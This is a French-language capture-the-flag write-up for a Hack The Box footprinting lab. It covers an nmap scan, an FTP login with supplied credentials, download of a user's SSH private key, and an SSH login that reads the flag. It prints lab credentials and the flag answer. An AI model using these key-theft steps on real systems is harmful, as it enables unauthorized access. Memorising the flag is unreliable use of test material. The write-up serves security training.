Footprinting Lab – Easy

🎯 Objectif de la mission

Dans le cadre d’un audit de sécurité interne, la société Inlanefreight Ltd nous a mandatés pour effectuer un test de reconnaissance passive sur trois serveurs de leur infrastructure. Ce test est destiné à évaluer les risques liés à une mauvaise configuration ou à une exposition excessive d'informations sensibles. Aucune attaque intrusive ou exploitation active n’est autorisée.

Notre mission ici se concentre sur le premier serveur identifié comme un serveur DNS interne. L’objectif est :

  • D’identifier toutes les informations disponibles via ce serveur (zonetransfer, informations de configuration, sous-domaines, etc.)

  • D’exploiter ces données pour comprendre les éventuelles failles ou vecteurs d’attaque

  • De récupérer le contenu du fichier flag.txt présent sur la machine cible

📄 Informations

  • Le serveur DNS est exposé sur le réseau interne.

  • Des identifiants ont été récupérés : ceil:qwer1234

  • Des discussions en interne évoquent l’usage de clés SSH par certains employés.

  • L’usage d’exploits ou de techniques agressives est strictement interdit.

Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.

Scan TCP de la cible : 

$ nmap -A -T5 -p- -oN TCP_Easy 10.129.84.241

PORT     STATE SERVICE VERSION
21/tcp   open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.84.241]
|   NULL: 
|_    220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.84.241]
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
2121/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Ceil's FTP) [10.129.84.241]
|   NULL: 
|_    220 ProFTPD Server (Ceil's FTP) [10.129.84.241]

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On observe alors 2 services FTP actifs : 

21/tcp   open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.84.241]

[...]

2121/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Ceil's FTP) [10.129.84.241]

On se connecte au FTP de ceil avec ses identifiants (ceil:qwer1234) : 

$ ftp ceil@10.129.84.19 2121
Connected to 10.129.84.19.
220 ProFTPD Server (Ceil's FTP) [10.129.84.19]
331 Password required for ceil
Password: 
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.

Nous listons son répertoire actuel : 

ftp> ls -al
229 Entering Extended Passive Mode (|||31588|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-------   1 ceil     ceil          294 Nov 10  2021 .bash_history
-rw-r--r--   1 ceil     ceil          220 Nov 10  2021 .bash_logout
-rw-r--r--   1 ceil     ceil         3771 Nov 10  2021 .bashrc
drwx------   2 ceil     ceil         4096 Nov 10  2021 .cache
-rw-r--r--   1 ceil     ceil          807 Nov 10  2021 .profile
drwx------   2 ceil     ceil         4096 Nov 10  2021 .ssh
-rw-------   1 ceil     ceil          759 Nov 10  2021 .viminfo

On peut observer la présence du répertoire .ssh. Nous nous y rendons pour récupérer la clé privée de connexion SSH : 

ftp> cd .ssh
250 CWD command successful

ftp> pwd
Remote directory: /.ssh

ftp> ls -al
229 Entering Extended Passive Mode (|||24957|)
150 Opening ASCII mode data connection for file list
drwx------   2 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-rw-r--   1 ceil     ceil          738 Nov 10  2021 authorized_keys
-rw-------   1 ceil     ceil         3381 Nov 10  2021 id_rsa
-rw-r--r--   1 ceil     ceil          738 Nov 10  2021 id_rsa.pub
226 Transfer complete

ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||2693|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |***********************************************************|  3381        4.70 MiB/s    00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (114.00 KiB/s)

Une fois téléchargé, nous appliquons à la clé privée les droits nécessaires avant de l'utiliser pour nous connecter à notre cible : 

chmod 600 id_rsa    # Attribution des droits pour le fichier id_rsa
$ ssh -i id_rsa ceil@10.129.84.19  # Utilisation de la clé privée pour la connexion
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)

Last login: Fri Jun 27 07:18:40 2025 from 10.10.14.130
ceil@NIXEASY:~$

Nous avons maintenant accès à notre cible via SSH.

Une fois connectés, nous analysons l'ensemble de la machine pour trouver le fichier flag.txt : 

ceil@NIXEASY:~$ ls ../
ceil  cry0l1t3  flag

ceil@NIXEASY:~$ ls ../flag/
flag.txt

ceil@NIXEASY:~$ cat ../flag/flag.txt 
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}

Afin de trouver l'emplacement du fichier, nous pouvons également executer la commande suivante sur notre cible : 

ceil@NIXEASY:~$ find / -type f -name "flag.txt" 2>/dev/null
/home/flag/flag.txt

Nous obtenons donc le flag de ce premier niveau : 

HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
PrécédentWindows Remote Management ProtocolsSuivantFootprinting Lab – Medium

Mis à jour